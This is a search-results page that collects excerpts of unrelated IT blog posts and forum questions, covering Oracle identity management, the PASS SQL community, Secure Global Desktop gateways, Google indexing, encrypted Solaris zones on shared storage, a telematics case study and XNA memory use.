Search Results

Search found 6668 results on 267 pages for 'global catalog'.

Page 93/267 | < Previous Page | 89 90 91 92 93 94 95 96 97 98 99 100  | Next Page >

  • Partner Blog Series: PwC Perspectives Part 2 - Jumpstarting your IAM program with R2

    - by Tanu Sood
    Identity and access management (IAM) isn’t a new concept. Over the past decade, companies have begun to address identity management through a variety of solutions that have primarily focused on provisioning. . The new age workforce is converging at a rapid pace with ever increasing demand to use diverse portfolio of applications and systems to interact and interface with their peers in the industry and customers alike. Oracle has taken a significant leap with their release of Identity and Access Management 11gR2 towards enabling this global workforce to conduct their business in a secure, efficient and effective manner. As companies deal with IAM business drivers, it becomes immediately apparent that holistic, rather than piecemeal, approaches better address their needs. When planning an enterprise-wide IAM solution, the first step is to create a common framework that serves as the foundation on which to build the cost, compliance and business process efficiencies. As a leading industry practice, IAM should be established on a foundation of accurate data for identity management, making this data available in a uniform manner to downstream applications and processes. Mature organizations are looking beyond IAM’s basic benefits to harness more advanced capabilities in user lifecycle management. For any organization looking to embark on an IAM initiative, consider the following use cases in managing and administering user access. Expanding the Enterprise Provisioning Footprint Almost all organizations have some helpdesk resources tied up in handling access requests from users, a distraction from their core job of handling problem tickets. This dependency has mushroomed from the traditional acceptance of provisioning solutions integrating and addressing only a portion of applications in the heterogeneous landscape Oracle Identity Manager (OIM) 11gR2 solves this problem by offering integration with third party ticketing systems as “disconnected applications”. It allows for the existing business processes to be seamlessly integrated into the system and tracked throughout its lifecycle. With minimal effort and analysis, an organization can begin integrating OIM with groups or applications that are involved with manually intensive access provisioning and de-provisioning activities. This aspect of OIM allows organizations to on-board applications and associated business processes quickly using out of box templates and frameworks. This is especially important for organizations looking to fold in users and resources from mergers and acquisitions. Simplifying Access Requests Organizations looking to implement access request solutions often find it challenging to get their users to accept and adopt the new processes.. So, how do we improve the user experience, make it intuitive and personalized and yet simplify the user access process? With R2, OIM helps organizations alleviate the challenge by placing the most used functionality front and centre in the new user request interface. Roles, application accounts, and entitlements can all be found in the same interface as catalog items, giving business users a single location to go to whenever they need to initiate, approve or track a request. Furthermore, if a particular item is not relevant to a user’s job function or area inside the organization, it can be hidden so as to not overwhelm or confuse the user with superfluous options. The ability to customize the user interface to suit your needs helps in exercising the business rules effectively and avoiding access proliferation within the organization. Saving Time with Templates A typical use case that is most beneficial to business users is flexibility to place, edit, and withdraw requests based on changing circumstances and business needs. With OIM R2, multiple catalog items can now be added and removed from the shopping cart, an ecommerce paradigm that many users are already familiar with. This feature can be especially useful when setting up a large number of new employees or granting existing department or group access to a newly integrated application. Additionally, users can create their own shopping cart templates in order to complete subsequent requests more quickly. This feature saves the user from having to search for and select items all over again if a request is similar to a previous one. Advanced Delegated Administration A key feature of any provisioning solution should be to empower each business unit in managing their own access requests. By bringing administration closer to the user, you improve user productivity, enable efficiency and alleviate the administration overhead. To do so requires a federated services model so that the business units capable of shouldering the onus of user life cycle management of their business users can be enabled to do so. OIM 11gR2 offers advanced administrative options for creating, managing and controlling business logic and workflows through easy to use administrative interface and tools that can be exposed to delegated business administrators. For example, these business administrators can establish or modify how certain requests and operations should be handled within their business unit based on a number of attributes ranging from the type of request or the risk level of the individual items requested. Closed-Loop Remediation Security continues to be a major concern for most organizations. Identity management solutions bolster security by ensuring only the right users have the right access to the right resources. To prevent unauthorized access and where it already exists, the ability to detect and remediate it, are key requirements of an enterprise-grade proven solution. But the challenge with most solutions today is that some of this information still exists in silos. And when changes are made to systems directly, not all information is captured. With R2, oracle is offering a comprehensive Identity Governance solution that our customer organizations are leveraging for closed loop remediation that allows for an automated way for administrators to revoke unauthorized access. The change is automatically captured and the action noted for continued management. Conclusion While implementing provisioning solutions, it is important to keep the near term and the long term goals in mind. The provisioning solution should always be a part of a larger security and identity management program but with the ability to seamlessly integrate not only with the company’s infrastructure but also have the ability to leverage the information, business models compiled and used by the other identity management solutions. This allows organizations to reduce the cost of ownership, close security gaps and leverage the existing infrastructure. And having done so a multiple clients’ sites, this is the approach we recommend. In our next post, we will take a journey through our experiences of advising clients looking to upgrade to R2 from a previous version or migrating from a different solution. Meet the Writers:   Praveen Krishna is a Manager in the Advisory Security practice within PwC.  Over the last decade Praveen has helped clients plan, architect and implement Oracle identity solutions across diverse industries.  His experience includes delivering security across diverse topics like network, infrastructure, application and data where he brings a holistic point of view to problem solving. Dharma Padala is a Director in the Advisory Security practice within PwC.  He has been implementing medium to large scale Identity Management solutions across multiple industries including utility, health care, entertainment, retail and financial sectors.   Dharma has 14 years of experience in delivering IT solutions out of which he has been implementing Identity Management solutions for the past 8 years. Scott MacDonald is a Director in the Advisory Security practice within PwC.  He has consulted for several clients across multiple industries including financial services, health care, automotive and retail.   Scott has 10 years of experience in delivering Identity Management solutions. John Misczak is a member of the Advisory Security practice within PwC.  He has experience implementing multiple Identity and Access Management solutions, specializing in Oracle Identity Manager and Business Process Engineering Language (BPEL). Jenny (Xiao) Zhang is a member of the Advisory Security practice within PwC.  She has consulted across multiple industries including financial services, entertainment and retail. Jenny has three years of experience in delivering IT solutions out of which she has been implementing Identity Management solutions for the past one and a half years.

    Read the article

  • Rolling Along: PASS Board Year 2, Q2

    - by Denise McInerney
    Eighteen months into my time as a PASS Director I’m especially proud of what the Virtual Chapters have accomplished and want to share that progress with you. I'm also pleased that the organization has invested more resources to support the VCs. In this quarter I got to attend two conferences and meet more members of the SQL community. Virtual Chapters In the first six months of 2013 VCs have hosted more than 50 webinars, offering free technical education to over 6200 attendees. This is a great benefit to PASS members; thanks to the VC leaders, volunteers and speakers who contribute their time to produce these events. The Performance VC held their “Summer Performance Palooza”, an event featuring eight back-to-back sessions. Links to the session recordings can be found on the VCs web site. The new webinar platform, GoToWebinar, has been rolled out to all the VCs. This is a more stable, scalable platform and represents an important investment into the future of the VCs. A few new VCs are in the planning stages, including one focused on Security and one for Russian speakers. Visit the Virtual Chapter home page to sign up for the chapters that interest you. Each Virtual Chapter is offering a discount code for PASS Summit 2013. Be sure to ask your VC leader for the code to save $200 on Summit registration. 24 Hours of PASS The next 24HOP will be on July 31. This Summit Preview edition will feature 24 consecutive webcasts presented by experts who will be speaking at Summit in October. Registration for this free event is open now. And we will be using the GoToWebinar platform for 24HOP also. Business Analytics Conference April marked the first PASS Business Analytics Conference in Chicago. This introduced PASS to another segment of data professionals: the analysts and data scientists who work with the world’s growing collection of data. Overall the inaugural event was a success and gave us a glimpse into this increasingly important space. After Chicago the Board had several serious discussions about the lessons learned from this seven and what we should do next. We agreed to apply those lessons and continue to invest in this event; there will be a PASS Business Analytics Conference in 2014. I’m very pleased the next event will be in San Jose, CA, the heart of Silicon Valley, a place where a great deal of investment and innovation in data analytics is taking place. Global SQL Community Over the last couple of years PASS has been taking steps to become more relevant to SQL communities in different parts of the world. In May I had the opportunity to attend SQL Bits XI in Nottingham, England. It was enlightening to meet and talk with SQL professionals from around the U.K. as well as many other European countries. The many SQL Bits volunteers put on a great event and were gracious hosts. Budgets The Board passed the FY14 budget at the end of June. The  budget process can be challenging and requires the Board to make some difficult choices about where to allocate resources. Overall I’m satisfied with the decisions we made and think we are investing in the right activities and programs. Next Up The Board is meeting July 18-19 in Kansas City. We will be holding the Executive Committee election for the Exec Co that will take office in 2014. We will also be discussing plans for the next BA conference as well as the next steps for our Global Growth initiative. Applications for the upcoming Board of Directors election open on July 24. If you are considering running for the Board you can visit the PASS elections site to learn more about the election process. And I encourage anyone considering running to reach out to current and past Board members to learn about what the role entails. Plans for the next PASS Summit are in full swing. We are working on some fun new ideas to introduce attendees to the many ways to become involved in the SQL community.

    Read the article

  • Friday Tips #6, Part 1

    - by Chris Kawalek
    We have a two parter this week, with this post focusing on desktop virtualization and the next one on server virtualization. Question: Why would I use the Oracle Secure Global Desktop Secure Gateway? Answer by Rick Butland, Principal Sales Consultant, Oracle Desktop Virtualization: Well, for the benefit of those who might not be familiar with client connections in Oracle Secure Global Desktop (SGD), let me back up and briefly explain. An SGD client connects to an SGD server using two distinct protocols, which, by default, require two distinct TCP ports. The first is the HTTP protocol, used by the web browser to connect to the SGD webserver on TCP port 80, or if secure connections are enabled (SSL/TLS), then TCP port 443, commonly identified as the "HTTPS" port, that is, "SSL encrypted HTTP." The second protocol from the client to the server is the Adaptive Internet Protocol, or AIP, which is used for displaying applications, transferring drive mapping data, print jobs, and so on. By default, AIP uses the TCP port 3104, or port 5307 when SSL is enabled. When SGD clients need to access SGD over a firewall, the ports that AIP requires are typically "closed"; and most administrators are reluctant, to put it mildly, to change their firewall configurations to allow AIP traffic on 3144/5307.   To avoid this problem, SGD introduced "Firewall Forwarding", a technique where, in effect, both http and AIP traffic are "multiplexed" onto a single "well-known" TCP port, that is port 443, the https port.  This is also known as single-port firewall traversal.  This technique takes advantage of the fact that, as a "well-known service", port 443 is usually "open",   allowing (encrypted) traffic to pass. At the target SGD server, the two protocols are de-multiplexed and routed appropriately. The Secure Gateway was developed in response to requirements from customers for SGD to support multi-stage DMZ's, and to avoid exposing SGD servers and the information they contain directly to connections from the Internet. The Secure Gateway acts as a reverse-proxy in the first-tier of the DMZ, accepting, authenticating, and terminating incoming client connections, and then re-encrypting the connections, and proxying them, routing them on to SGD servers, deeper in the network. The client no longer needs to know the name/IP address of the SGD servers in their network, they connect to the gateway, only. The gateway takes care of those internal network details.     The Secure Gateway supports the same "single-port firewall" capability as does "Firewall Forwarding", but offers the additional advantage of load-balancing incoming client connections amongst SGD array members, which could be cumbersome without a forward-deployed secure gateway. Load-balancing weights and policies can be monitored and tuned using the "Balancer Manager" application, and Apache mod_proxy_balancer directives.   Going forward, our architects recommend the use of the Secure Gateway over "Firewall Forwarding" for single-port firewall traversal, due to its architectural advantages, its greater flexibility and enhanced features.  Finally, it should be noted that the Secure Gateway is not separately priced; any licensed SGD customer may use the Secure Gateway component at no additional cost.   For more information, see the "Secure Gateway Administrator's Guide".

    Read the article

  • Single page not appearing in Google Search

    - by Dan
    Description I have a static franchise website which has various sub pages each dedicated to an individual franchisee. For each franchisee the page, the only thing slightly similar between all of them are the page titles, they follow this structure: <title> Welcome to THE_COMPANY - PRODUCT_DESCRIPTION Services, THE_LOCATION </title> THE_COMPANY and PRODUCT_DESCRIPTION are the same across all franchisees, however THE_LOCATION changes depeding on where they are located in the UK. Each franchisee page has the following <meta /> tags: <meta name="DC.creator" content="user"/> <meta name="DC.format" content="text/html"/> <meta name="DC.language" content="en"/> <meta name="DC.date.modified" content="2014-01-23T11:22:31+00:00"/> <meta name="DC.date.created" content="2014-01-23T11:22:09+00:00"/> <meta name="DC.type" content="Page"/> <meta name="DC.distribution" content="Global"/> <meta name="robots" content="ALL"/> <meta name="distribution" content="Global"/> The main content on each franchisee page is completely different. The Problem There is one particular franchisee page, located in Area A.. Which will not appear in Google Search results at all. However every single other franchisee (if you Google Search for "THE_COMPANY, THE_LOCATION" is number 1). And if I do the same search on Bing, Yahoo or DuckDuckGo, the Area A franchisee is the first result on all of them. Has Google for some reason black listed one page on the site? What I Have Tried Ensuring the page is referenced in my sitemap.xml file 'Fetching as Google Bot' the link www.the_company.co.uk/areaa When that came back as OK I would submit to index Resubmitting the sitemap.xml file in Webmaster Tools Linking to the Area A page from another pages content For this I also waited about 3 weeks before checking again to give Google time to re-index Making a change to the page content and waiting another 2 / 3 weeks Removing the page completely and recreating it with an alternative URL The closest thing I have found to this issue is this StackOverflow question but this particular franchisee has existed for almost a year, it used to appear on Google searches however no longer does. I'm guessing the Panda update wasn't too happy with something on the page, but it hasn't effected anything else on the site and I am at a loss for things to try. I would greatly appreciate any information or thoughts as to what could have caused this Thanks. Update In line with Daniel Fukudas answer below, I have followed some of his steps but everything seems to check out alright: HTTP Headers HTTP/1.1 200 OK => Date => Tue, 25 Feb 2014 16:31:29 GMT Server => Zope/(2.12.16, python 2.6.6, linux2) ZServer/1.1 Content-Length => 40078 Expires => Sat, 01 Jan 2000 00:00:00 GMT Content-Type => text/html;charset=utf-8 Content-Language => en Vary => Accept-Encoding Connection => close Robots <meta /> tag: <meta name="robots" content="ALL"/> I have updated this <meta /> tag to read content="INDEX" instead now. robots.txt: User-agent: * Disallow: User-Agent: Googlebot Disallow: /*sendto_form$ Disallow: /*folder_factories$ Using site:THE_COMPANY.co.uk: Searching for 'AREA A site:THE_COMPANY.co.uk' does not return the page, but regardless of that searching just for site:THE_COMPANY.co.uk will not necessarily return every indexed page, or so I understand... Update It appears Google likes to drop pages every now and then from the index, despite my steps above, I left the site alone and the page appeared back in the SERPs by itself.

    Read the article

  • Partner Blog Series: PwC Perspectives - Looking at R2 for Customer Organizations

    - by Tanu Sood
    Welcome to the first of our partner blog series. November Mondays are all about PricewaterhouseCoopers' perespective on Identity and R2. In this series, we have identity management experts from PricewaterhouseCoopers (PwC) share their perspective on (and experiences with) the recent identity management release, Oracle Identity Management R2. The purpose of the series is to discuss real world identity use cases that helped shape the innovations in the recent R2 release and the implementation strategies that customers are employing today with expertise from PwC. Part 1: Looking at R2 for Customer Organizations In this inaugural post, we will discuss some of the new features of the R2 release of Oracle Identity Manager that some of our customer organizations are implementing today and the business rationale for those. Oracle's R2 Security portfolio represents a solid step forward for a platform that is already market-leading.  Prior to R2, Oracle was an industry titan in security with reliable products, expansive compatibility, and a large customer base.  Oracle has taken their identity platform to the next level in their latest version, R2.  The new features include a customizable UI, a request catalog, flexible security, and enhancements for its connectors, and more. Oracle customers will be impressed by the new Oracle Identity Manager (OIM) business-friendly UI.  Without question, Oracle has invested significant time in responding to customer feedback about making access requests and related activities easier for non-IT users.  The flexibility to add information to screens, hide fields that are not important to a particular customer, and adjust web themes to suit a company's preference make Oracle's Identity Manager stand out among its peers.  Customers can also expect to carry UI configurations forward with minimal migration effort to future versions of OIM.  Oracle's flexible UI will benefit many organizations looking for a customized feel with out-of-the-box configurations. Organizations looking to extend their services to end users will benefit significantly from new usability features like OIM’s ‘Catalog.’  Customers familiar with Oracle Identity Analytics' 'Glossary' feature will be able to relate to the concept.  It will enable Roles, Entitlements, Accounts, and Resources to be requested through the out-of-the-box UI.  This is an industry-changing feature as customers can make the process to request access easier than ever.  For additional ease of use, Oracle has introduced a shopping cart style request interface that further simplifies the experience for end users.  Common requests can be setup as profiles to save time.  All of this is combined with the approval workflow engine introduced in R1 that provides the flexibility customers need to meet their compliance requirements. Enhanced security was also on the list of features Oracle wanted to deliver to its customers.  The new end-user UI provides additional granular access controls.  Common Help Desk use cases can be implemented with ease by updating the application profiles.  Access can be rolled out so that administrators can only manage a certain department or organization.  Further, OIM can be more easily configured to select which fields can be read-only vs. updated.  Finally, this security model can be used to limit search results for roles and entitlements intended for a particular department.  Every customer has a different need for access and OIM now matches this need with a flexible security model. One of the important considerations when selecting an Identity Management platform is compatibility.  The number of supported platform connectors and how well it can integrate with non-supported platforms is a key consideration for selecting an identity suite.  Oracle has a long list of supported connectors.  When a customer has a requirement for a platform not on that list, Oracle has a solution too.  Oracle is introducing a simplified architecture called Identity Connector Framework (ICF), which holds the potential to simplify custom connectors.  Finally, Oracle has introduced a simplified process to profile new disconnected applications from the web browser.  This is a useful feature that enables administrators to profile applications quickly as well as empowering the application owner to fulfill requests from their web browser.  Support will still be available for connectors based on previous versions in R2. Oracle Identity Manager's new R2 version has delivered many new features customers have been asking for.  Oracle has matured their platform with R2, making it a truly distinctive platform among its peers. In our next post, expect a deep dive into use cases for a customer considering R2 as their new Enterprise identity solution. In the meantime, we look forward to hearing from you about the specific challenges you are facing and your experience in solving those. Meet the Writers Dharma Padala is a Director in the Advisory Security practice within PwC.  He has been implementing medium to large scale Identity Management solutions across multiple industries including utility, health care, entertainment, retail and financial sectors.   Dharma has 14 years of experience in delivering IT solutions out of which he has been implementing Identity Management solutions for the past 8 years. Scott MacDonald is a Director in the Advisory Security practice within PwC.  He has consulted for several clients across multiple industries including financial services, health care, automotive and retail.   Scott has 10 years of experience in delivering Identity Management solutions. John Misczak is a member of the Advisory Security practice within PwC.  He has experience implementing multiple Identity and Access Management solutions, specializing in Oracle Identity Manager and Business Process Engineering Language (BPEL). Jenny (Xiao) Zhang is a member of the Advisory Security practice within PwC.  She has consulted across multiple industries including financial services, entertainment and retail. Jenny has three years of experience in delivering IT solutions out of which she has been implementing Identity Management solutions for the past one and a half years. Praveen Krishna is a Manager in the Advisory  Security practice within PwC.  Over the last decade Praveen has helped clients plan, architect and implement Oracle identity solutions across diverse industries.  His experience includes delivering security across diverse topics like network, infrastructure, application and data where he brings a holistic point of view to problem solving.

    Read the article

  • Solaris 11.1: Encrypted Immutable Zones on (ZFS) Shared Storage

    - by darrenm
    Solaris 11 brought both ZFS encryption and the Immutable Zones feature and I've talked about the combination in the past.  Solaris 11.1 adds a fully supported method of storing zones in their own ZFS using shared storage so lets update things a little and put all three parts together. When using an iSCSI (or other supported shared storage target) for a Zone we can either let the Zones framework setup the ZFS pool or we can do it manually before hand and tell the Zones framework to use the one we made earlier.  To enable encryption we have to take the second path so that we can setup the pool with encryption before we start to install the zones on it. We start by configuring the zone and specifying an rootzpool resource: # zonecfg -z eizoss Use 'create' to begin configuring a new zone. zonecfg:eizoss> create create: Using system default template 'SYSdefault' zonecfg:eizoss> set zonepath=/zones/eizoss zonecfg:eizoss> set file-mac-profile=fixed-configuration zonecfg:eizoss> add rootzpool zonecfg:eizoss:rootzpool> add storage \ iscsi://zs7120-tvp540-c.uk.oracle.com/luname.naa.600144f09acaacd20000508e64a70001 zonecfg:eizoss:rootzpool> end zonecfg:eizoss> verify zonecfg:eizoss> commit zonecfg:eizoss> Now lets create the pool and specify encryption: # suriadm map \ iscsi://zs7120-tvp540-c.uk.oracle.com/luname.naa.600144f09acaacd20000508e64a70001 PROPERTY VALUE mapped-dev /dev/dsk/c10t600144F09ACAACD20000508E64A70001d0 # echo "zfscrypto" > /zones/p # zpool create -O encryption=on -O keysource=passphrase,file:///zones/p eizoss \ /dev/dsk/c10t600144F09ACAACD20000508E64A70001d0 # zpool export eizoss Note that the keysource example above is just for this example, realistically you should probably use an Oracle Key Manager or some other better keystorage, but that isn't the purpose of this example.  Note however that it does need to be one of file:// https:// pkcs11: and not prompt for the key location.  Also note that we exported the newly created pool.  The name we used here doesn't actually mater because it will get set properly on import anyway. So lets go ahead and do our install: zoneadm -z eizoss install -x force-zpool-import Configured zone storage resource(s) from: iscsi://zs7120-tvp540-c.uk.oracle.com/luname.naa.600144f09acaacd20000508e64a70001 Imported zone zpool: eizoss_rpool Progress being logged to /var/log/zones/zoneadm.20121029T115231Z.eizoss.install Image: Preparing at /zones/eizoss/root. AI Manifest: /tmp/manifest.xml.ujaq54 SC Profile: /usr/share/auto_install/sc_profiles/enable_sci.xml Zonename: eizoss Installation: Starting ... Creating IPS image Startup linked: 1/1 done Installing packages from: solaris origin: http://pkg.us.oracle.com/solaris/release/ Please review the licenses for the following packages post-install: consolidation/osnet/osnet-incorporation (automatically accepted, not displayed) Package licenses may be viewed using the command: pkg info --license <pkg_fmri> DOWNLOAD PKGS FILES XFER (MB) SPEED Completed 187/187 33575/33575 227.0/227.0 384k/s PHASE ITEMS Installing new actions 47449/47449 Updating package state database Done Updating image state Done Creating fast lookup database Done Installation: Succeeded Note: Man pages can be obtained by installing pkg:/system/manual done. Done: Installation completed in 929.606 seconds. Next Steps: Boot the zone, then log into the zone console (zlogin -C) to complete the configuration process. Log saved in non-global zone as /zones/eizoss/root/var/log/zones/zoneadm.20121029T115231Z.eizoss.install That was really all we had to do, when the install is done boot it up as normal. The zone administrator has no direct access to the ZFS wrapping keys used for the encrypted pool zone is stored on.  Due to how inheritance works in ZFS he can still create new encrypted datasets that use those wrapping keys (without them ever being inside a process in the zone) or he can create encrypted datasets inside the zone that use keys of his own choosing, the output below shows the two cases: rpool is inheriting the key material from the global zone (note we can see the value of the keysource property but we don't use it inside the zone nor does that path need to be (or is) accessible inside the zone). Whereas rpool/export/home/bob has set keysource locally. # zfs get encryption,keysource rpool rpool/export/home/bob NAME PROPERTY VALUE SOURCE rpool encryption on inherited from $globalzone rpool keysource passphrase,file:///zones/p inherited from $globalzone rpool/export/home/bob encryption on local rpool/export/home/bob keysource passphrase,prompt local  

    Read the article

  • Openmatics Revolutionizes Fleet Management with Standards-Based Vehicle Telematics Platform

    - by Michael Snow
    Openmatics s.r.o. was founded in 2010 as a subsidiary of ZF Friedrichshafen AG, a global player in driveline and chassis technology. Oracle Customer:  Openmatics s.r.o.Location:  Pilsen, Czech RepublicIndustry:  AutomotiveEmployees:  70 Its goal was to develop and operate a flexible, open telematics platform for automotive applications, which is independent from vehicle and component suppliers—recognizing that the fragmented telematics market was not meeting today’s fleet management needs. Openmatics provides a rich product portfolio, and customers can extend the platform, as required, to meet their needs. Partners and third-parties can develop their own applications using the Openmatics’ software development kit and can sell them via the Openmatics app shop.ZF Friedrichshafen AG is a global player in driveline and chassis technology. With 121 production companies and 650 service partners in 26 countries, ZF is among the top 10 largest automotive suppliers worldwide. Founded in 1915 to develop and produce transmissions for airships and vehicles, the group’s product offerings now include transmissions and steering systems as well as chassis components and complete axle systems and modules.  A word from Openmatics s.r.o.  “Oracle WebCenter Portal, together with the underlying Oracle Application Development Framework, provided the fundamental infrastructure for the Openmatics platform. Fleet managers can now reduce fuel consumption and operating costs, and more efficiently manage vehicle usage, maintenance, and safety. The standards-based platform allows third-party suppliers to deploy their own vehicle telematics services as Openmatics apps and creates a de facto standard for the automotive industry, independent from a single manufacturer or service provider.” – Gero Strobel, Head of Development, Openmatics s.r.o. Challenges Create an industry standard for vehicle telematics by establishing a customizable platform that enables access to telematics information, such as current and past fuel consumption, through a web browser to better meet automotive market and customer needs Reduce fleet-management costs by eliminating the need to invest in isolated telematics hardware and software solutions per vehicle brand and vehicle component manufacturer Establish an open platform where third-party providers—such as original equipment manufacturers (OEM), insurers, fleet operators, and individual developers—can deploy their own vehicle telematics services Allow users to purchase targeted telematics services as single apps to reduce costs and ensure rapid growth of telematics services available on the platform Enable users to configure their telematics apps with ease to make sure the platform meets individual fleet management requirements, such as analyzing past and current fuel consumption of a truck fleet Solutions Deployed Oracle WebCenter Portal as a foundation for Openmatics, a standards-based automotive telematics platform that provides next-generation fleet management with unified digital communication from and to vehicles on the move Used Oracle Application Development Framework as the development framework for Oracle WebCenter Portal’s components and services, providing developers with ready-to-use software development kits with application programming interfaces, design templates, and visual tools that accelerated time to market Used Oracle Enterprise Pack for Eclipse to simplify telematics application development in Java Enabled fleet monitoring by recording vehicle data—such as fuel consumption information—through onboard units, delivering the information to Oracle Database, and making it accessible through a customizable app portfolio on any web browser Stored vehicle telematics data—sent as encrypted information—in Oracle Database, ensuring data integrity and immediate availability for the platform’s telematics applications Enabled a wide range of telematics services suppliers, from vehicle component manufacturers to fleet application developers, to offer vehicle telematics services on the Openmatics platform, ensuring platform independence from OEMs Provided Openmatics customers with the means to individually select the automotive telematics services that are relevant to their business requirements, eliminating the need to pay for superfluous information and reducing fleet management costs Oracle Products & Services Oracle Application Development Framework Oracle WebCenter Portal Oracle SOA Suite Oracle Enterprise Pack for Eclipse Oracle Database Oracle Consulting &amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;lt;span id=&amp;amp;amp;amp;amp;quot;XinhaEditingPostion&amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;/span&amp;amp;amp;amp;amp;gt;amp;&amp;amp;amp;amp;amp;amp;lt;span id=&amp;amp;amp;amp;amp;amp;quot;XinhaEditingPostion&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;lt;/span&amp;amp;amp;amp;amp;amp;gt;lt;p&amp;amp;amp;amp;amp;amp;amp;amp;gt; &amp;amp;amp;amp;amp;amp;amp;amp;lt;/p&amp;amp;amp;amp;amp;amp;amp;amp;gt;

    Read the article

  • XNA WP7 Texture memory and ContentManager

    - by jlongstreet
    I'm trying to get my WP7 XNA game's memory under control and under the 90MB limit for submission. One target I identified was UI textures, especially fullscreen ones, that would never get unloaded. So I moved UI texture loads to their own ContentManager so I can unload them. However, this doesn't seem to affect the value of Microsoft.Phone.Info.DeviceExtendedProperties.GetValue("ApplicationCurrentMemoryUsage"), so it doesn't look like the memory is actually being released. Example: splash screens. In Game.LoadContent(): Application.Instance.SetContentManager("UI"); // set the current content manager for (int i = 0; i < mSplashTextures.Length; ++i) { // load the splash textures mSplashTextures[i] = Application.Instance.Content.Load<Texture2D>(msSplashTextureNames[i]); } // set the content manager back to the global one Application.Instance.SetContentManager("Global"); When the initial load is done and the title screen starts, I do: Application.Instance.GetContentManager("UI").Unload(); The three textures take about 6.5 MB of memory. Before unloading the UI ContentManager, I see that ApplicationCurrentMemoryUsage is at 34.29 MB. After unloading the ContentManager (and doing a full GC.Collect()), it's still at 34.29 MB. But after that, I load another fullscreen texture (for the title screen background) and memory usage still doesn't change. Could it be keeping the memory for these textures allocated and reusing it? edit: very simple test: protected override void LoadContent() { // Create a new SpriteBatch, which can be used to draw textures. spriteBatch = new SpriteBatch(GraphicsDevice); PrintMemUsage("Before texture load: "); // TODO: use this.Content to load your game content here red = this.Content.Load<Texture2D>("Untitled"); PrintMemUsage("After texture load: "); } private void PrintMemUsage(string tag) { Debug.WriteLine(tag + Microsoft.Phone.Info.DeviceExtendedProperties.GetValue("ApplicationCurrentMemoryUsage")); } protected override void Update(GameTime gameTime) { // Allows the game to exit if (GamePad.GetState(PlayerIndex.One).Buttons.Back == ButtonState.Pressed) this.Exit(); // TODO: Add your update logic here if (count++ == 100) { GC.Collect(); GC.WaitForPendingFinalizers(); PrintMemUsage("Before CM unload: "); this.Content.Dispose(); GC.Collect(); GC.WaitForPendingFinalizers(); PrintMemUsage("After CM unload: "); red = null; spriteBatch.Dispose(); GC.Collect(); GC.WaitForPendingFinalizers(); PrintMemUsage("After SpriteBatch Dispose(): "); } base.Update(gameTime); } protected override void Draw(GameTime gameTime) { GraphicsDevice.Clear(Color.CornflowerBlue); // TODO: Add your drawing code here if (red != null) { spriteBatch.Begin(); spriteBatch.Draw(red, new Vector2(0,0), Color.White); spriteBatch.End(); } base.Draw(gameTime); } This prints something like (it changes every time): Before texture load: 7532544 After texture load: 10727424 Before CM unload: 9875456 After CM unload: 9953280 After SpriteBatch Dispose(): 9953280

    Read the article

  • Challenges in Corporate Reporting - New Independent Research

    - by ndwyouell
    Earlier this year, Oracle and Accenture sponsored a global study on trends in financial close and reporting. We surveyed 1,123 finance professionals in large organizations in 12 countries around the world during February and March. Financial Consolidation and Reporting is the most mature aspect of Enterprise Performance Management with mainstream solutions having been around for over 30 years. But of course over this time there have been many changes and very significant increases in regulation. So just what is the current state is Financial Consolidation and Reporting in our major corporations across the world? We commissioned this independent research to find out. Highlights of the result are: •          Seeking change: Businesses recognize they need to invest in financial reporting to address the challenges they currently face. 47 percent of companies have made substantial investments over the last year to the financial close, filing, and reporting processes. •          Ineffective investments: Despite these investments, spreadsheets (72 percent) and e-mails (68 percent) are still being used daily to track and manage reporting, suggesting that new investments are falling short of expectations. •          Increased costs and uncertainty: The situation is so opaque that managers across the finance function are unable to fully understand the financial impact or cost implications of reporting, with 60 percent of respondents admitting they did not know the total cost of managing and publicizing their financial results. •          Persistent challenges: 68 percent of respondents admitted that they have inadequate visibility into reporting processes, while 84 percent of finance managers surveyed said they find it difficult to control the quality of financial data across the entire reporting process. •          Decreased effectiveness: 71 percent of finance managers feel their effectiveness is limited in some way by data-analysis–related issues, while 39 percent of C-level or VP-level respondents say their effectiveness is impaired by limited visibility. •          Missed deadlines: Due to late changes to the chart of accounts, 15 percent of global businesses have missed statutory filings, putting their companies at risk of financial penalties and potentially impacting share value. The report makes it clear that investments made to date by these large organizations around the world have been uneven across the close, reporting, and filing processes, which has led to the challenges these organizations currently face in the overall process. Regardless of whether companies are using a variety of solutions or a single solution, the report shows they continue to witness increased costs, ineffectual data management, and missed reporting, which—in extreme circumstances—can impact a company’s corporate image and share value. The good news is that businesses realize that these problems persist and 86 percent of companies are likely to make a significant investment during the next five years to address these issues. While they should invest, it is critical that they direct investments correctly to address the key issues this research identified: •          Improving data integrity •          Optimizing processes •          Integrating the extended financial close process By addressing these issues and with clear guidance on how to implement the correct business processes, infrastructure, and software solutions, finance teams will find that their reporting processes are much more effective, cost-efficient, and aligned with their performance expectations. To get a copy of the full report: http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=11747758&src=7300117&Act=92 To replay a webcast discussing the findings: http://www.cfo.com/webcast.cfm?webcast=14639438&pcode=ORA061912_ORA

    Read the article

  • Configuring correct port for Oozie (invoking PIG script) in Cloudera Hue

    - by user2985324
    I am new to CDH4 Oozie workflow editor. While trying to invoke a pig script from Oozie workflow editor, i am getting the following error. HadoopAccessorException: E0900: Jobtracker [mymachine:8032] not allowed, not in Oozies whitelist It looks like Oozie is submitting the job to Yarn port (8032). I want it to submit to 8021 (MR jobtracker) port. Can someone help me in identify where to set the job tracker URL or port so that oozie picks up the correct one (using Hue or Cloudera manager). Previously I tried the following but none of them helped Modfied workflow.xml file /user/hue/oozie/workspaces/../workflow.xml file. However it gets overwritten when I submit the job from workflow editor. In cloudera Manager -- oozie -- configuration --Oozie Server (advanced) -- Oozie Server Configuration Safety Valve for oozie-site.xml property I set the following- <property> <name>oozie.service.HadoopAccessorService.nameNode.whitelist</name> <value>mymachine:8020</value> oozie.service.HadoopAccessorService.jobTracker.whitelist mymachine:8021 and restarted the oozie service. 3. Tried to override 'jobTracker' property while configuring the pig task. This appears as follows in the workflow file however it doesn't take effect (or doesn't override) and still uses 8032 port. <global> <configuration> <property> <name>jobTracker</name> <value>mymachine:8021</value> </property> </configuration> </global> I am using CDH4 version. Thanks for looking into my question.

    Read the article

  • IQueryable<> from stored procedure (entity framework)

    - by mmcteam
